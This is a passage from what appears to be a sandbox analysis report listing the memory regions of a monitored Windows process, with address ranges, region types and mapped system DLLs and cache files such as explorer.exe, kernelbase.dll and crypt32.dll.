(normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2897 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2898 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2899 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2900 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2901 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2902 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2903 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2904 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2905 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2906 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2907 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2908 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2909 start_va = 0x560000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2910 start_va = 0x5e0000 end_va = 0x767fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 2911 start_va = 0x770000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 2912 start_va = 0x780000 end_va = 0x900fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 2913 start_va = 0x910000 end_va = 0x1d0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 2914 start_va = 0x1d10000 end_va = 0x210afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d10000" filename = "" Region: id = 2915 start_va = 0x2110000 end_va = 0x2446fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2916 start_va = 0x2450000 end_va = 0x2453fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2917 start_va = 0x2460000 end_va = 0x2472fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 2918 start_va = 0x2480000 end_va = 0x2480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 2919 start_va = 0x2490000 end_va = 0x24a7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db") Region: id = 2920 start_va = 0x24b0000 end_va = 0x24b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 2921 start_va = 0x24c0000 end_va = 0x24c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024c0000" filename = "" Region: id = 2922 start_va = 0x24d0000 end_va = 0x24fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 2923 start_va = 0x2500000 end_va = 0x2501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002500000" filename = "" Region: id = 2924 start_va = 0x2510000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 2925 start_va = 0x2590000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 2926 start_va = 0x2610000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 2927 start_va = 0x2690000 end_va = 0x270ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 2928 start_va = 0x2710000 end_va = 0x27effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2929 start_va = 0x27f0000 end_va = 0x286ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 2930 start_va = 0x2870000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 2931 start_va = 0x28f0000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 2932 start_va = 0x2970000 end_va = 0x2971fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002970000" filename = "" Region: id = 2933 start_va = 0x2980000 end_va = 0x2981fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 2934 start_va = 0x2990000 end_va = 0x2a4bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 2935 start_va = 0x2a50000 end_va = 0x2a53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 2936 start_va = 0x2a60000 end_va = 0x2b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 2937 start_va = 0x2b60000 end_va = 0x2b66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 2938 start_va = 0x2b70000 end_va = 0x2b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 2939 start_va = 0x2b80000 end_va = 0x3bbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 2940 start_va = 0x3bc0000 end_va = 0x3bc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 2941 start_va = 0x3bd0000 end_va = 0x3bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 2942 start_va = 0x3be0000 end_va = 0x3be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 2943 start_va = 0x3bf0000 end_va = 0x3bf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bf0000" filename = "" Region: id = 2944 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 2945 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 2946 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 2947 start_va = 0x3ca0000 end_va = 0x3ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 2948 start_va = 0x3cb0000 end_va = 0x3cb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 2949 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 2950 start_va = 0x3dc0000 end_va = 0x3dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 2951 start_va = 0x3dd0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 2952 start_va = 0x3de0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 2953 start_va = 0x3df0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003df0000" filename = "" Region: id = 2954 start_va = 0x3e00000 end_va = 0x3e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 2955 start_va = 0x3e10000 end_va = 0x3e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 2956 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 2957 start_va = 0x3e30000 end_va = 0x3e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2958 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 2959 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e50000" filename = "" Region: id = 2960 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 2961 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 2962 start_va = 0x3e80000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 2963 start_va = 0x3ec0000 end_va = 0x3ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 2964 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2965 start_va = 0x3ef0000 end_va = 0x3f13fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 2966 start_va = 0x3f20000 end_va = 0x3f43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f20000" filename = "" Region: id = 2967 start_va = 0x3f50000 end_va = 0x3f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 2968 start_va = 0x3f60000 end_va = 0x3f63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2969 start_va = 0x3f70000 end_va = 0x3fb4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 2970 start_va = 0x3fc0000 end_va = 0x3fc3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2971 start_va = 0x3fd0000 end_va = 0x405dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2972 start_va = 0x4060000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 2973 start_va = 0x40e0000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 2974 start_va = 0x41e0000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 2975 start_va = 0x4260000 end_va = 0x4260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 2976 start_va = 0x4270000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 2977 start_va = 0x42f0000 end_va = 0x436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 2978 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2979 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2980 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2981 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2982 start_va = 0x7ff7cbc50000 end_va = 0x7ff7cc097fff monitored = 0 entry_point = 0x7ff7cbcee090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 2983 start_va = 0x7fffa70b0000 end_va = 0x7fffa70bbfff monitored = 0 entry_point = 0x7fffa70b18b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 2984 start_va = 0x7fffa70c0000 end_va = 0x7fffa710cfff monitored = 0 entry_point = 0x7fffa70cd180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 2985 start_va = 0x7fffa7110000 end_va = 0x7fffa7c1afff monitored = 0 entry_point = 0x7fffa725a540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 2986 start_va = 0x7fffa7c20000 end_va = 0x7fffa7c6ffff monitored = 0 entry_point = 0x7fffa7c22580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 2987 start_va = 0x7fffa7c70000 end_va = 0x7fffa810ffff monitored = 0 entry_point = 0x7fffa7d08740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 2988 start_va = 0x7fffa8110000 end_va = 0x7fffa8159fff monitored = 0 entry_point = 0x7fffa8115800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 2989 start_va = 0x7fffa8160000 end_va = 0x7fffa81c9fff monitored = 0 entry_point = 0x7fffa8175e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 2990 start_va = 0x7fffa8200000 end_va = 0x7fffa8264fff monitored = 0 entry_point = 0x7fffa8204c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 2991 start_va = 0x7fffa8270000 end_va = 0x7fffa84e3fff monitored = 0 entry_point = 0x7fffa82e0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2992 start_va = 0x7fffa84f0000 end_va = 0x7fffa8504fff monitored = 0 entry_point = 0x7fffa84f2c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 2993 start_va = 0x7fffa88b0000 end_va = 0x7fffa8960fff monitored = 0 entry_point = 0x7fffa88c08f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 2994 start_va = 0x7fffa8ff0000 end_va = 0x7fffa90bdfff monitored = 0 entry_point = 0x7fffa90214c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 2995 start_va = 0x7fffa90c0000 end_va = 0x7fffa91b8fff monitored = 0 entry_point = 0x7fffa9108000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 2996 start_va = 0x7fffaa550000 end_va = 0x7fffaa5bffff monitored = 0 entry_point = 0x7fffaa572960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2997 start_va = 0x7fffaa8d0000 end_va = 0x7fffaa8f7fff monitored = 0 entry_point = 0x7fffaa8d8c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 2998 start_va = 0x7fffab040000 end_va = 0x7fffab094fff monitored = 0 entry_point = 0x7fffab043fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 2999 start_va = 0x7fffab7e0000 end_va = 0x7fffab871fff monitored = 0 entry_point = 0x7fffab82a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 3000 start_va = 0x7fffac340000 end_va = 0x7fffac4fcfff monitored = 0 entry_point = 0x7fffac36af90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 3001 start_va = 0x7fffac890000 end_va = 0x7fffac9c5fff monitored = 0 entry_point = 0x7fffac8bf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 3002 start_va = 0x7fffadac0000 end_va = 0x7fffadbcdfff monitored = 0 entry_point = 0x7fffadb0eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 3003 start_va = 0x7fffae9b0000 end_va = 0x7fffaeb60fff monitored = 0 entry_point = 0x7fffaea461a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 3004 start_va = 0x7fffaed20000 end_va = 0x7fffaf1b2fff monitored = 0 entry_point = 0x7fffaed2f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 3005 start_va = 0x7fffaf1c0000 end_va = 0x7fffaf226fff monitored = 0 entry_point = 0x7fffaf1de710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 3006 start_va = 0x7fffaf280000 end_va = 0x7fffaf321fff monitored = 0 entry_point = 0x7fffaf2a0a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 3007 start_va = 0x7fffaf330000 end_va = 0x7fffaf5d7fff monitored = 0 entry_point = 0x7fffaf3c3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 3008 start_va = 0x7fffaf5e0000 end_va = 0x7fffaf601fff monitored = 0 entry_point = 0x7fffaf5e1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3009 start_va = 0x7fffaf6f0000 end_va = 0x7fffaf7d2fff monitored = 0 entry_point = 0x7fffaf727da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 3010 start_va = 0x7fffafae0000 end_va = 0x7fffafc65fff monitored = 0 entry_point = 0x7fffafb2d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3011 start_va = 0x7fffafc70000 end_va = 0x7fffafc8bfff monitored = 0 entry_point = 0x7fffafc737a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3012 start_va = 0x7fffafcd0000 end_va = 0x7fffafce2fff monitored = 0 entry_point = 0x7fffafcd2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3013 start_va = 0x7fffafcf0000 end_va = 0x7fffafd14fff monitored = 0 entry_point = 0x7fffafcf2300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 3014 start_va = 0x7fffafd50000 end_va = 0x7fffafd74fff monitored = 0 entry_point = 0x7fffafd65220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 3015 start_va = 0x7fffafe40000 end_va = 0x7fffafeb8fff monitored = 0 entry_point = 0x7fffafe5fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 3016 start_va = 0x7fffaffd0000 end_va = 0x7fffb0065fff monitored = 0 entry_point = 0x7fffafff5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3017 start_va = 0x7fffb0090000 end_va = 0x7fffb00b6fff monitored = 0 entry_point = 0x7fffb0097940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3018 start_va = 0x7fffb0240000 end_va = 0x7fffb033ffff monitored = 0 entry_point = 0x7fffb0280f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 3019 start_va = 0x7fffb0db0000 end_va = 0x7fffb0dcefff monitored = 0 entry_point = 0x7fffb0db5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3020 start_va = 0x7fffb0fd0000 end_va = 0x7fffb0fe6fff monitored = 0 entry_point = 0x7fffb0fd79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3021 start_va = 0x7fffb12d0000 end_va = 0x7fffb12fcfff monitored = 0 entry_point = 0x7fffb12e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3022 start_va = 0x7fffb1460000 end_va = 0x7fffb14b5fff monitored = 0 entry_point = 0x7fffb1470bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3023 start_va = 0x7fffb14e0000 end_va = 0x7fffb1508fff monitored = 0 entry_point = 0x7fffb14f4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3024 start_va = 0x7fffb1650000 end_va = 0x7fffb1663fff monitored = 0 entry_point = 0x7fffb16552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3025 start_va = 0x7fffb1670000 end_va = 0x7fffb16bafff monitored = 0 entry_point = 0x7fffb16735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3026 start_va = 0x7fffb16c0000 end_va = 0x7fffb16cffff monitored = 0 entry_point = 0x7fffb16c56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3027 start_va = 0x7fffb16d0000 end_va = 0x7fffb16defff monitored = 0 entry_point = 0x7fffb16d3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3028 start_va = 0x7fffb16e0000 end_va = 0x7fffb1794fff monitored = 0 entry_point = 0x7fffb17222e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3029 start_va = 0x7fffb18e0000 end_va = 0x7fffb1aa6fff monitored = 0 entry_point = 0x7fffb193db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3030 start_va = 0x7fffb1ab0000 end_va = 0x7fffb1b19fff monitored = 0 entry_point = 0x7fffb1ae6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3031 start_va = 0x7fffb1b20000 end_va = 0x7fffb1d07fff monitored = 0 entry_point = 0x7fffb1b4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3032 start_va = 0x7fffb1d10000 end_va = 0x7fffb2353fff monitored = 0 entry_point = 